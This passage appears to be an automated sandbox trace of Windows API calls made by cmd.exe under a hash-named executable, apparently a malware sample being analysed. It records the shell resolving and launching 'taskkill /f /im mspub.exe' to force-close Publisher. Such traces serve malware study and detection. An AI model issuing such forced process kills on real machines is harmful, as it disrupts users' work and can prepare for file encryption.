lpFindFileData=0x19f9d0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0x3ce179de, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x3ce179de, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0x4971f0 [0210.159] FindClose (in: hFindFile=0x4971f0 | out: hFindFile=0x4971f0) returned 1 [0210.159] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX", lpFindFileData=0x19f9d0 | out: lpFindFileData=0x19f9d0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3ce179de, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x84ac775d, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x84ac775d, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="RDhJ0CNFevzX", cAlternateFileName="RDHJ0C~1")) returned 0x4971f0 [0210.159] FindClose (in: hFindFile=0x4971f0 | out: hFindFile=0x4971f0) returned 1 [0210.159] _wcsnicmp (_String1="RDHJ0C~1", _String2="RDhJ0CNFevzX", _MaxCount=0xc) returned 16 [0210.159] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop", lpFindFileData=0x19f9d0 | out: lpFindFileData=0x19f9d0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3ced6473, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x8d4a6a0d, ftLastAccessTime.dwHighDateTime=0x1d83aa1, ftLastWriteTime.dwLowDateTime=0x8d4a6a0d, ftLastWriteTime.dwHighDateTime=0x1d83aa1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 0x4971f0 [0210.159] FindClose (in: hFindFile=0x4971f0 | out: hFindFile=0x4971f0) returned 1 [0210.160] GetFileAttributesW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop")) returned 0x11 [0210.160] SetCurrentDirectoryW (lpPathName="C:\\Users\\RDhJ0CNFevzX\\Desktop" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop")) returned 1 [0210.160] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\RDhJ0CNFevzX\\Desktop") returned 1 [0210.160] GetProcessHeap () returned 0x490000 [0210.160] RtlFreeHeap (HeapHandle=0x490000, Flags=0x0, BaseAddress=0x49a888) returned 1 [0210.160] GetEnvironmentStringsW () returned 0x497fd0* [0210.161] GetProcessHeap () returned 0x490000 [0210.161] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x8, Size=0xa76) returned 0x499e48 [0210.161] FreeEnvironmentStringsA (penv="=") returned 1 [0210.161] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0xf47720 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop") returned 0x1d [0210.161] GetProcessHeap () returned 0x490000 [0210.161] RtlFreeHeap (HeapHandle=0x490000, Flags=0x0, BaseAddress=0x4971a0) returned 1 [0210.161] GetProcessHeap () returned 0x490000 [0210.161] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x8, Size=0x400e) returned 0x49bd48 [0210.162] GetProcessHeap () returned 0x490000 [0210.162] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x8, Size=0x46) returned 0x4971a0 [0210.162] GetProcessHeap () returned 0x490000 [0210.162] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x8, Size=0x4008) returned 0x49fd60 [0210.162] GetProcessHeap () returned 0x490000 [0210.162] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x8, Size=0x4008) returned 0x4a3d70 [0210.164] _wcsnicmp (_String1="task", _String2="cmd ", _MaxCount=0x4) returned 17 [0210.164] GetProcessHeap () returned 0x490000 [0210.164] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x8, Size=0x418) returned 0x49a8c8 [0210.164] SetErrorMode (uMode=0x0) returned 0x8003 [0210.164] SetErrorMode (uMode=0x1) returned 0x0 [0210.164] GetFullPathNameW (in: lpFileName="taskkill \\f \\.", nBufferLength=0x208, lpBuffer=0x49a8d0, lpFilePart=0x19fbac | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\taskkill \\f", lpFilePart=0x19fbac*="f") returned 0x29 [0210.164] SetErrorMode (uMode=0x8003) returned 0x1 [0210.164] GetProcessHeap () returned 0x490000 [0210.164] RtlReAllocateHeap (Heap=0x490000, Flags=0x0, Ptr=0x49a8c8, Size=0x78) returned 0x49a8c8 [0210.164] GetProcessHeap () returned 0x490000 [0210.165] RtlSizeHeap (HeapHandle=0x490000, Flags=0x0, MemoryPointer=0x49a8c8) returned 0x78 [0210.165] NeedCurrentDirectoryForExePathW (ExeName="taskkill \\f \\.") returned 1 [0210.165] GetProcessHeap () returned 0x490000 [0210.165] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x8, Size=0x62) returned 0x4971f0 [0210.165] GetProcessHeap () returned 0x490000 [0210.165] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x8, Size=0xb8) returned 0x49a948 [0210.165] GetProcessHeap () returned 0x490000 [0210.165] RtlReAllocateHeap (Heap=0x490000, Flags=0x0, Ptr=0x49a948, Size=0x62) returned 0x49a948 [0210.165] GetProcessHeap () returned 0x490000 [0210.165] RtlSizeHeap (HeapHandle=0x490000, Flags=0x0, MemoryPointer=0x49a948) returned 0x62 [0210.165] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0xf3f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x35 [0210.165] GetProcessHeap () returned 0x490000 [0210.165] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x8, Size=0xe0) returned 0x49a9b8 [0210.169] GetProcessHeap () returned 0x490000 [0210.169] RtlReAllocateHeap (Heap=0x490000, Flags=0x0, Ptr=0x49a9b8, Size=0x76) returned 0x49a9b8 [0210.169] GetProcessHeap () returned 0x490000 [0210.169] RtlSizeHeap (HeapHandle=0x490000, Flags=0x0, MemoryPointer=0x49a9b8) returned 0x76 [0210.169] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0210.172] FindFirstFileExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\taskkill \\f\\im mspub.exe ", fInfoLevelId=0x1, lpFindFileData=0x19f958, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x19f958) returned 0xffffffff [0210.172] GetLastError () returned 0x3 [0210.172] GetProcessHeap () returned 0x490000 [0210.173] RtlFreeHeap (HeapHandle=0x490000, Flags=0x0, BaseAddress=0x49fd60) returned 1 [0210.173] GetProcessHeap () returned 0x490000 [0210.173] RtlFreeHeap (HeapHandle=0x490000, Flags=0x0, BaseAddress=0x4a3d70) returned 1 [0210.173] GetProcessHeap () returned 0x490000 [0210.174] RtlFreeHeap (HeapHandle=0x490000, Flags=0x0, BaseAddress=0x49bd48) returned 1 [0210.174] GetConsoleOutputCP () returned 0x1b5 [0210.176] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xf3f460 | out: lpCPInfo=0xf3f460) returned 1 [0210.176] GetUserDefaultLCID () returned 0x409 [0210.176] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0xf434a0, cchData=8 | out: lpLCData=":") returned 2 [0210.176] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x19fd84, cchData=128 | out: lpLCData="0") returned 2 [0210.176] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x19fd84, cchData=128 | out: lpLCData="0") returned 2 [0210.176] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x19fd84, cchData=128 | out: lpLCData="1") returned 2 [0210.177] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0xf434b0, cchData=8 | out: lpLCData="/") returned 2 [0210.177] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0xf43500, cchData=32 | out: lpLCData="Mon") returned 4 [0210.177] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0xf43540, cchData=32 | out: lpLCData="Tue") returned 4 [0210.177] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0xf43580, cchData=32 | out: lpLCData="Wed") returned 4 [0210.177] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0xf435c0, cchData=32 | out: lpLCData="Thu") returned 4 [0210.177] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0xf43600, cchData=32 | out: lpLCData="Fri") returned 4 [0210.177] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0xf43640, cchData=32 | out: lpLCData="Sat") returned 4 [0210.177] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0xf43680, cchData=32 | out: lpLCData="Sun") returned 4 [0210.177] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0xf434c0, cchData=8 | out: lpLCData=".") returned 2 [0210.177] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0xf434e0, cchData=8 | out: lpLCData=",") returned 2 [0210.177] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0210.178] GetProcessHeap () returned 0x490000 [0210.178] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x0, Size=0x20c) returned 0x49aa80 [0210.179] GetConsoleTitleW (in: lpConsoleTitle=0x49aa80, nSize=0x104 | out: lpConsoleTitle="C:\\Users\\RDhJ0CNFevzX\\Desktop\\ec7bae245d61cb7f7a9fa51f487a22e006109d628645f31b880fc72ac58f8027.exe") returned 0x62 [0210.180] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x75600000 [0210.180] GetProcAddress (hModule=0x75600000, lpProcName="CopyFileExW") returned 0x7561ffc0 [0210.181] GetProcAddress (hModule=0x75600000, lpProcName="IsDebuggerPresent") returned 0x7561b0b0 [0210.181] GetProcAddress (hModule=0x75600000, lpProcName="SetConsoleInputExeNameW") returned 0x7559b440 [0210.181] GetProcessHeap () returned 0x490000 [0210.181] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x8, Size=0x400a) returned 0x49bd48 [0210.181] GetProcessHeap () returned 0x490000 [0210.182] RtlFreeHeap (HeapHandle=0x490000, Flags=0x0, BaseAddress=0x49bd48) returned 1 [0210.182] _wcsicmp (_String1="taskkill", _String2=")") returned 75 [0210.183] _wcsicmp (_String1="FOR", _String2="taskkill") returned -14 [0210.183] _wcsicmp (_String1="FOR/?", _String2="taskkill") returned -14 [0210.183] _wcsicmp (_String1="IF", _String2="taskkill") returned -11 [0210.183] _wcsicmp (_String1="IF/?", _String2="taskkill") returned -11 [0210.183] _wcsicmp (_String1="REM", _String2="taskkill") returned -2 [0210.183] _wcsicmp (_String1="REM/?", _String2="taskkill") returned -2 [0210.183] GetProcessHeap () returned 0x490000 [0210.183] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x8, Size=0x58) returned 0x49ac98 [0210.183] GetProcessHeap () returned 0x490000 [0210.183] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x8, Size=0x1a) returned 0x497e80 [0210.183] GetProcessHeap () returned 0x490000 [0210.183] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x8, Size=0x2e) returned 0x497260 [0210.184] GetConsoleTitleW (in: lpConsoleTitle=0x19fa70, nSize=0x104 | out: lpConsoleTitle="C:\\Users\\RDhJ0CNFevzX\\Desktop\\ec7bae245d61cb7f7a9fa51f487a22e006109d628645f31b880fc72ac58f8027.exe") returned 0x62 [0210.198] _wcsicmp (_String1="taskkill", _String2="DIR") returned 16 [0210.198] _wcsicmp (_String1="taskkill", _String2="ERASE") returned 15 [0210.198] _wcsicmp (_String1="taskkill", _String2="DEL") returned 16 [0210.198] _wcsicmp (_String1="taskkill", _String2="TYPE") returned -24 [0210.198] _wcsicmp (_String1="taskkill", _String2="COPY") returned 17 [0210.198] _wcsicmp (_String1="taskkill", _String2="CD") returned 17 [0210.198] _wcsicmp (_String1="taskkill", _String2="CHDIR") returned 17 [0210.198] _wcsicmp (_String1="taskkill", _String2="RENAME") returned 2 [0210.198] _wcsicmp (_String1="taskkill", _String2="REN") returned 2 [0210.199] _wcsicmp (_String1="taskkill", _String2="ECHO") returned 15 [0210.199] _wcsicmp (_String1="taskkill", _String2="SET") returned 1 [0210.199] _wcsicmp (_String1="taskkill", _String2="PAUSE") returned 4 [0210.199] _wcsicmp (_String1="taskkill", _String2="DATE") returned 16 [0210.199] _wcsicmp (_String1="taskkill", _String2="TIME") returned -8 [0210.199] _wcsicmp (_String1="taskkill", _String2="PROMPT") returned 4 [0210.199] _wcsicmp (_String1="taskkill", _String2="MD") returned 7 [0210.199] _wcsicmp (_String1="taskkill", _String2="MKDIR") returned 7 [0210.199] _wcsicmp (_String1="taskkill", _String2="RD") returned 2 [0210.199] _wcsicmp (_String1="taskkill", _String2="RMDIR") returned 2 [0210.199] _wcsicmp (_String1="taskkill", _String2="PATH") returned 4 [0210.199] _wcsicmp (_String1="taskkill", _String2="GOTO") returned 13 [0210.199] _wcsicmp (_String1="taskkill", _String2="SHIFT") returned 1 [0210.199] _wcsicmp (_String1="taskkill", _String2="CLS") returned 17 [0210.199] _wcsicmp (_String1="taskkill", _String2="CALL") returned 17 [0210.199] _wcsicmp (_String1="taskkill", _String2="VERIFY") returned -2 [0210.199] _wcsicmp (_String1="taskkill", _String2="VER") returned -2 [0210.199] _wcsicmp (_String1="taskkill", _String2="VOL") returned -2 [0210.199] _wcsicmp (_String1="taskkill", _String2="EXIT") returned 15 [0210.199] _wcsicmp (_String1="taskkill", _String2="SETLOCAL") returned 1 [0210.199] _wcsicmp (_String1="taskkill", _String2="ENDLOCAL") returned 15 [0210.199] _wcsicmp (_String1="taskkill", _String2="TITLE") returned -8 [0210.199] _wcsicmp (_String1="taskkill", _String2="START") returned 1 [0210.199] _wcsicmp (_String1="taskkill", _String2="DPATH") returned 16 [0210.199] _wcsicmp (_String1="taskkill", _String2="KEYS") returned 9 [0210.199] _wcsicmp (_String1="taskkill", _String2="MOVE") returned 7 [0210.199] _wcsicmp (_String1="taskkill", _String2="PUSHD") returned 4 [0210.199] _wcsicmp (_String1="taskkill", _String2="POPD") returned 4 [0210.199] _wcsicmp (_String1="taskkill", _String2="ASSOC") returned 19 [0210.199] _wcsicmp (_String1="taskkill", _String2="FTYPE") returned 14 [0210.200] _wcsicmp (_String1="taskkill", _String2="BREAK") returned 18 [0210.200] _wcsicmp (_String1="taskkill", _String2="COLOR") returned 17 [0210.200] _wcsicmp (_String1="taskkill", _String2="MKLINK") returned 7 [0210.200] _wcsicmp (_String1="taskkill", _String2="DIR") returned 16 [0210.200] _wcsicmp (_String1="taskkill", _String2="ERASE") returned 15 [0210.200] _wcsicmp (_String1="taskkill", _String2="DEL") returned 16 [0210.200] _wcsicmp (_String1="taskkill", _String2="TYPE") returned -24 [0210.200] _wcsicmp (_String1="taskkill", _String2="COPY") returned 17 [0210.200] _wcsicmp (_String1="taskkill", _String2="CD") returned 17 [0210.200] _wcsicmp (_String1="taskkill", _String2="CHDIR") returned 17 [0210.200] _wcsicmp (_String1="taskkill", _String2="RENAME") returned 2 [0210.200] _wcsicmp (_String1="taskkill", _String2="REN") returned 2 [0210.200] _wcsicmp (_String1="taskkill", _String2="ECHO") returned 15 [0210.200] _wcsicmp (_String1="taskkill", _String2="SET") returned 1 [0210.200] _wcsicmp (_String1="taskkill", _String2="PAUSE") returned 4 [0210.200] _wcsicmp (_String1="taskkill", _String2="DATE") returned 16 [0210.200] _wcsicmp (_String1="taskkill", _String2="TIME") returned -8 [0210.200] _wcsicmp (_String1="taskkill", _String2="PROMPT") returned 4 [0210.200] _wcsicmp (_String1="taskkill", _String2="MD") returned 7 [0210.201] _wcsicmp (_String1="taskkill", _String2="MKDIR") returned 7 [0210.201] _wcsicmp (_String1="taskkill", _String2="RD") returned 2 [0210.201] _wcsicmp (_String1="taskkill", _String2="RMDIR") returned 2 [0210.201] _wcsicmp (_String1="taskkill", _String2="PATH") returned 4 [0210.201] _wcsicmp (_String1="taskkill", _String2="GOTO") returned 13 [0210.201] _wcsicmp (_String1="taskkill", _String2="SHIFT") returned 1 [0210.201] _wcsicmp (_String1="taskkill", _String2="CLS") returned 17 [0210.201] _wcsicmp (_String1="taskkill", _String2="CALL") returned 17 [0210.201] _wcsicmp (_String1="taskkill", _String2="VERIFY") returned -2 [0210.201] _wcsicmp (_String1="taskkill", _String2="VER") returned -2 [0210.201] _wcsicmp (_String1="taskkill", _String2="VOL") returned -2 [0210.201] _wcsicmp (_String1="taskkill", _String2="EXIT") returned 15 [0210.201] _wcsicmp (_String1="taskkill", _String2="SETLOCAL") returned 1 [0210.201] _wcsicmp (_String1="taskkill", _String2="ENDLOCAL") returned 15 [0210.201] _wcsicmp (_String1="taskkill", _String2="TITLE") returned -8 [0210.201] _wcsicmp (_String1="taskkill", _String2="START") returned 1 [0210.201] _wcsicmp (_String1="taskkill", _String2="DPATH") returned 16 [0210.201] _wcsicmp (_String1="taskkill", _String2="KEYS") returned 9 [0210.201] _wcsicmp (_String1="taskkill", _String2="MOVE") returned 7 [0210.201] _wcsicmp (_String1="taskkill", _String2="PUSHD") returned 4 [0210.201] _wcsicmp (_String1="taskkill", _String2="POPD") returned 4 [0210.202] _wcsicmp (_String1="taskkill", _String2="ASSOC") returned 19 [0210.202] _wcsicmp (_String1="taskkill", _String2="FTYPE") returned 14 [0210.202] _wcsicmp (_String1="taskkill", _String2="BREAK") returned 18 [0210.202] _wcsicmp (_String1="taskkill", _String2="COLOR") returned 17 [0210.202] _wcsicmp (_String1="taskkill", _String2="MKLINK") returned 7 [0210.202] _wcsicmp (_String1="taskkill", _String2="FOR") returned 14 [0210.202] _wcsicmp (_String1="taskkill", _String2="IF") returned 11 [0210.202] _wcsicmp (_String1="taskkill", _String2="REM") returned 2 [0210.202] GetProcessHeap () returned 0x490000 [0210.203] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x8, Size=0x210) returned 0x49acf8 [0210.203] GetProcessHeap () returned 0x490000 [0210.203] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x8, Size=0x40) returned 0x49af10 [0210.203] _wcsnicmp (_String1="task", _String2="cmd ", _MaxCount=0x4) returned 17 [0210.203] GetProcessHeap () returned 0x490000 [0210.203] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x8, Size=0x418) returned 0x4905c8 [0210.203] SetErrorMode (uMode=0x0) returned 0x8003 [0210.203] SetErrorMode (uMode=0x1) returned 0x0 [0210.203] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x4905d0, lpFilePart=0x19f57c | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop", lpFilePart=0x19f57c*="Desktop") returned 0x1d [0210.203] SetErrorMode (uMode=0x8003) returned 0x1 [0210.203] GetProcessHeap () returned 0x490000 [0210.203] RtlReAllocateHeap (Heap=0x490000, Flags=0x0, Ptr=0x4905c8, Size=0x56) returned 0x4905c8 [0210.203] GetProcessHeap () returned 0x490000 [0210.203] RtlSizeHeap (HeapHandle=0x490000, Flags=0x0, MemoryPointer=0x4905c8) returned 0x56 [0210.203] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0xf3f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x63 [0210.203] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0210.204] GetProcessHeap () returned 0x490000 [0210.204] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x8, Size=0x110) returned 0x49af58 [0210.204] GetProcessHeap () returned 0x490000 [0210.204] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x8, Size=0x218) returned 0x49b070 [0210.209] GetProcessHeap () returned 0x490000 [0210.209] RtlReAllocateHeap (Heap=0x490000, Flags=0x0, Ptr=0x49b070, Size=0x112) returned 0x49b070 [0210.209] GetProcessHeap () returned 0x490000 [0210.209] RtlSizeHeap (HeapHandle=0x490000, Flags=0x0, MemoryPointer=0x49b070) returned 0x112 [0210.209] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0xf3f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x35 [0210.209] GetProcessHeap () returned 0x490000 [0210.209] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x8, Size=0xe0) returned 0x49b190 [0210.211] GetProcessHeap () returned 0x490000 [0210.211] RtlReAllocateHeap (Heap=0x490000, Flags=0x0, Ptr=0x49b190, Size=0x76) returned 0x49b190 [0210.211] GetProcessHeap () returned 0x490000 [0210.211] RtlSizeHeap (HeapHandle=0x490000, Flags=0x0, MemoryPointer=0x49b190) returned 0x76 [0210.211] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0210.211] FindFirstFileExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\taskkill.*", fInfoLevelId=0x1, lpFindFileData=0x19f308, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x19f308) returned 0xffffffff [0210.212] GetLastError () returned 0x2 [0210.212] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0210.212] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\taskkill.*", fInfoLevelId=0x1, lpFindFileData=0x19f308, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x19f308) returned 0x49b210 [0210.212] GetProcessHeap () returned 0x490000 [0210.212] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x0, Size=0x14) returned 0x497990 [0210.212] FindClose (in: hFindFile=0x49b210 | out: hFindFile=0x49b210) returned 1 [0210.212] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\taskkill.COM", fInfoLevelId=0x1, lpFindFileData=0x19f308, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x19f308) returned 0xffffffff [0210.213] GetLastError () returned 0x2 [0210.213] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\taskkill.EXE", fInfoLevelId=0x1, lpFindFileData=0x19f308, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x19f308) returned 0x49b210 [0210.213] GetProcessHeap () returned 0x490000 [0210.213] RtlReAllocateHeap (Heap=0x490000, Flags=0x0, Ptr=0x497990, Size=0x4) returned 0x49b250 [0210.213] FindClose (in: hFindFile=0x49b210 | out: hFindFile=0x49b210) returned 1 [0210.213] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0210.213] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0210.213] GetConsoleTitleW (in: lpConsoleTitle=0x19f7fc, nSize=0x104 | out: lpConsoleTitle="C:\\Users\\RDhJ0CNFevzX\\Desktop\\ec7bae245d61cb7f7a9fa51f487a22e006109d628645f31b880fc72ac58f8027.exe") returned 0x62 [0210.297] InitializeProcThreadAttributeList (in: lpAttributeList=0x19f728, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x19f70c | out: lpAttributeList=0x19f728, lpSize=0x19f70c) returned 1 [0210.297] UpdateProcThreadAttribute (in: lpAttributeList=0x19f728, dwFlags=0x0, Attribute=0x60001, lpValue=0x19f714, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x19f728, lpPreviousValue=0x0) returned 1 [0210.297] GetStartupInfoW (in: lpStartupInfo=0x19f760 | out: lpStartupInfo=0x19f760*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x13c, hStdOutput=0x140, hStdError=0x144)) [0210.297] GetProcessHeap () returned 0x490000 [0210.297] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x8, Size=0x18) returned 0x4977f0 [0210.297] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0210.298] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0210.298] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0210.298] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0210.298] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0210.298] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0210.298] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0210.298] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0210.298] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0210.298] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0210.298] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0210.298] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0210.298] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0210.298] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0210.298] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0210.298] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0210.298] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0210.298] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0210.298] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0210.298] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0210.298] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0210.298] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0210.298] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0210.298] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0210.298] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0210.298] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0210.299] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0210.299] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0210.299] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0210.299] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0210.299] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0210.299] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0210.299] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0210.299] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0210.299] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0210.299] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0210.299] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0210.299] GetProcessHeap () returned 0x490000 [0210.299] RtlFreeHeap (HeapHandle=0x490000, Flags=0x0, BaseAddress=0x4977f0) returned 1 [0210.299] GetProcessHeap () returned 0x490000 [0210.299] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x8, Size=0xa) returned 0x49b210 [0210.299] lstrcmpW (lpString1="\\taskkill.exe", lpString2="\\XCOPY.EXE") returned -1 [0210.302] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\taskkill.exe", lpCommandLine="taskkill /f /im mspub.exe ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\RDhJ0CNFevzX\\Desktop", lpStartupInfo=0x19f6b0*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="taskkill /f /im mspub.exe ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x19f6fc | out: lpCommandLine="taskkill /f /im mspub.exe ", lpProcessInformation=0x19f6fc*(hProcess=0x9c, hThread=0x98, 